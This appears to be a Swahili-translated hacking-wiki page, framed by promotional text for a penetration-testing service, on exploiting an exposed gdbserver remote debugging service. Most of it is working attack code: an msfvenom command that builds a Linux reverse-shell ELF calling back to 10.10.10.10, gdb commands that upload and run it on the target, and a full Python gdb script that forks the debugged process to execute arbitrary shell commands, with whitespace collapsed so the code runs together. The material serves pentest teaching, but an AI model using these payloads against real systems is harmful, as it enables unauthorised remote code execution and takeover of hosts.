Pata mtazamo wa hacker kuhusu programu zako za wavuti, mtandao, na wingu
Pata na ripoti kuhusu udhaifu muhimu, unaoweza kutumiwa kwa faida halisi ya biashara. Tumia zana zetu zaidi ya 20 za kawaida kupanga uso wa shambulio, pata masuala ya usalama yanayokuruhusu kupandisha mamlaka, na tumia matumizi ya moja kwa moja kukusanya ushahidi muhimu, ukigeuza kazi yako ngumu kuwa ripoti za kushawishi.
gdbserver ni chombo kinachowezesha ufuatiliaji wa programu kwa mbali. Inafanya kazi sambamba na programu inayohitaji ufuatiliaji kwenye mfumo mmoja, inayoitwa "lengo." Mpangilio huu unaruhusu GNU Debugger kuungana kutoka mashine tofauti, "mwenyeji," ambapo msimbo wa chanzo na nakala ya binary ya programu inayofuatiliwa zimehifadhiwa. Muunganisho kati ya gdbserver na debugger unaweza kufanywa kupitia TCP au laini ya serial, ikiruhusu mipangilio ya ufuatiliaji yenye kubadilika.
Unaweza kufanya gdbserver isikilize kwenye bandari yoyote na kwa sasa nmap haiwezi kutambua huduma hiyo.
Utekelezaji
Pakua na Tekeleza
Unaweza kwa urahisi kuunda elf backdoor na msfvenom, ipakue na uitekeleze:
# Trick shared by @B1n4rySh4d0wmsfvenom-plinux/x64/shell_reverse_tcpLHOST=10.10.10.10LPORT=4444PrependFork=true-felf-obinary.elfchmod+xbinary.elfgdbbinary.elf# Set remote debuger targettargetextended-remote10.10.10.11:1337# Upload elf fileremoteputbinary.elfbinary.elf# Set remote executable filesetremoteexec-file/home/user/binary.elf# Execute reverse shell executablerun# You should get your reverse-shell
# Given remote terminal running `gdbserver :2345 ./remote_executable`, we connect to that server.targetextended-remote192.168.1.4:2345# Load our custom gdb command `rcmd`.source./remote-cmd.py# Change to a trusty binary and run it to load itsetremoteexec-file/bin/bashr# Run until a point where libc has been loaded on the remote process, e.g. start of main().tbmainr# Run the remote command, e.g. `ls`.rcmdls
Kwanza kabisa unda skripti hii kwa ndani:
remote-cmd.py
#!/usr/bin/env python3import gdbimport reimport tracebackimport uuidclassRemoteCmd(gdb.Command):def__init__(self):self.addresses ={}self.tmp_file =f'/tmp/{uuid.uuid4().hex}'gdb.write(f"Using tmp output file: {self.tmp_file}.\n")gdb.execute("set detach-on-fork off")gdb.execute("set follow-fork-mode parent")gdb.execute("set max-value-size unlimited")gdb.execute("set pagination off")gdb.execute("set print elements 0")gdb.execute("set print repeats 0")super(RemoteCmd, self).__init__("rcmd", gdb.COMMAND_USER)defpreload(self):for symbol in ["close","execl","fork","free","lseek","malloc","open","read",]:self.load(symbol)defload(self,symbol):if symbol notin self.addresses:address_string = gdb.execute(f"info address {symbol}", to_string=True)match = re.match(f'Symbol "{symbol}" is at ([0-9a-fx]+) .*', address_string, re.IGNORECASE)if match andlen(match.groups())>0:self.addresses[symbol]= match.groups()[0]else:raiseRuntimeError(f'Could not retrieve address for symbol "{symbol}".')return self.addresses[symbol]defoutput(self):# From `fcntl-linux.h`O_RDONLY =0gdb.execute(f'set $fd = (int){self.load("open")}("{self.tmp_file}", {O_RDONLY})')# From `stdio.h`SEEK_SET =0SEEK_END =2gdb.execute(f'set $len = (int){self.load("lseek")}($fd, 0, {SEEK_END})')gdb.execute(f'call (int){self.load("lseek")}($fd, 0, {SEEK_SET})')ifint(gdb.convenience_variable("len"))<=0:gdb.write("No output was captured.")returngdb.execute(f'set $mem = (void*){self.load("malloc")}($len)')gdb.execute(f'call (int){self.load("read")}($fd, $mem, $len)')gdb.execute('printf "%s\\n", (char*) $mem')gdb.execute(f'call (int){self.load("close")}($fd)')gdb.execute(f'call (int){self.load("free")}($mem)')definvoke(self,arg,from_tty):try:self.preload()is_auto_solib_add = gdb.parameter("auto-solib-add")gdb.execute("set auto-solib-add off")parent_inferior = gdb.selected_inferior()gdb.execute(f'set $child_pid = (int){self.load("fork")}()')child_pid = gdb.convenience_variable("child_pid")child_inferior =list(filter(lambdax: x.pid == child_pid, gdb.inferiors()))[0]gdb.execute(f"inferior {child_inferior.num}")try:gdb.execute(f'call (int){self.load("execl")}("/bin/sh", "sh", "-c", "exec {arg} >{self.tmp_file} 2>&1", (char*)0)')except gdb.error as e:if ("The program being debugged exited while in a function called from GDB"instr(e)):passelse:raise efinally:gdb.execute(f"inferior {parent_inferior.num}")gdb.execute(f"remove-inferiors {child_inferior.num}")self.output()exceptExceptionas e:gdb.write("".join(traceback.TracebackException.from_exception(e).format()))raise efinally:gdb.execute(f'set auto-solib-add {"on"if is_auto_solib_add else"off"}')RemoteCmd()
Pata mtazamo wa hacker kuhusu programu zako za wavuti, mtandao, na wingu
Pata na ripoti kuhusu udhaifu muhimu, unaoweza kutumiwa kwa faida halisi ya biashara. Tumia zana zetu zaidi ya 20 za kawaida kupanga uso wa shambulio, pata masuala ya usalama yanayokuruhusu kupandisha mamlaka, na tumia matumizi ya moja kwa moja kukusanya ushahidi muhimu, ukigeuza kazi yako ngumu kuwa ripoti za kushawishi.